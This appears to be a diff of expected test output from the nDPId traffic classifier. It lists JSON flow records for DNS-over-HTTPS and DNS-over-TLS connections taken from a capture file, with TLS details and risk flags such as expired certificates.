{"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739380697,"flow_last_seen":946739410804,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2838,"flow_tot_l4_payload_len":5244,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739400581,"flow_last_seen":946739430677,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5345,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739400294,"flow_last_seen":946739430460,"flow_idle_time":7580000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5037,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":946739661512,"flow_last_seen":946739691599,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":4770,"flow_avg_l4_payload_len":366,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739374011,"flow_last_seen":946739404206,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3125,"flow_tot_l4_payload_len":5512,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739311335,"flow_last_seen":946739327906,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1562,"flow_tot_l4_payload_len":5128,"flow_avg_l4_payload_len":301,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946739603327,"flow_last_seen":946739633413,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3014,"flow_tot_l4_payload_len":4605,"flow_avg_l4_payload_len":383,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739401864,"flow_last_seen":946739432023,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6872,"flow_avg_l4_payload_len":381,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739311703,"flow_last_seen":946739327879,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5538,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":946739378281,"flow_last_seen":946739408545,"flow_idle_time":7580000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6534,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739385090,"flow_last_seen":946739415188,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":5274,"flow_avg_l4_payload_len":329,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":946739380870,"flow_last_seen":946739411017,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4647,"flow_avg_l4_payload_len":221,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946739298533,"flow_last_seen":946739298798,"flow_idle_time":7580000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":3077,"flow_avg_l4_payload_len":769,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946739299058,"flow_last_seen":946739299326,"flow_idle_time":7580000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":3075,"flow_avg_l4_payload_len":768,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":946739348407,"flow_last_seen":946739365024,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3098,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":946739310588,"flow_last_seen":946739327990,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3100,"flow_tot_l4_payload_len":5402,"flow_avg_l4_payload_len":270,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":946739304432,"flow_last_seen":946739327879,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":8183,"flow_avg_l4_payload_len":272,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739385216,"flow_last_seen":946739415379,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4699,"flow_avg_l4_payload_len":261,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739348961,"flow_last_seen":946739364914,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5460,"flow_avg_l4_payload_len":364,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739305016,"flow_last_seen":946739327879,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5516,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +01301{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":566,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946739879619,"flow_last_seen":946739879647,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":1272,"midstream":1,"thread_ts_msec":946739879647,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","server_names":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=jarjar.meganerd.nl","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"17:C9:8C:F5:DD:1F:0E:0F:DC:C5:42:4F:ED:C4:CD:57:5A:5D:7A:4F"}} 
+00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739400702,"flow_last_seen":946739407673,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":5567,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":946739312203,"flow_last_seen":946739327905,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":5116,"flow_avg_l4_payload_len":232,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
+00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":946739879619,"flow_last_seen":946739888204,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":4885,"flow_avg_l4_payload_len":348,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":946739389936,"flow_last_seen":946739420902,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":6677,"flow_avg_l4_payload_len":333,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739390933,"flow_last_seen":946739421078,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3111,"flow_tot_l4_payload_len":5324,"flow_avg_l4_payload_len":332,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739311566,"flow_last_seen":946739327918,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6429,"flow_avg_l4_payload_len":378,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739336955,"flow_last_seen":946739364937,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5781,"flow_avg_l4_payload_len":385,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739378577,"flow_last_seen":946739410674,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2503,"flow_tot_l4_payload_len":5076,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739305650,"flow_last_seen":946739328075,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2194,"flow_tot_l4_payload_len":5876,"flow_avg_l4_payload_len":367,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739304846,"flow_last_seen":946739327879,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3131,"flow_tot_l4_payload_len":6025,"flow_avg_l4_payload_len":354,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":946739310980,"flow_last_seen":946739321153,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":3003,"flow_tot_l4_payload_len":5652,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739317842,"flow_last_seen":946739327879,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5992,"flow_avg_l4_payload_len":399,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739402059,"flow_last_seen":946739432187,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6475,"flow_avg_l4_payload_len":380,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739354159,"flow_last_seen":946739364932,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":5263,"flow_avg_l4_payload_len":328,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739380697,"flow_last_seen":946739410804,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2838,"flow_tot_l4_payload_len":5244,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739400581,"flow_last_seen":946739430677,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5345,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
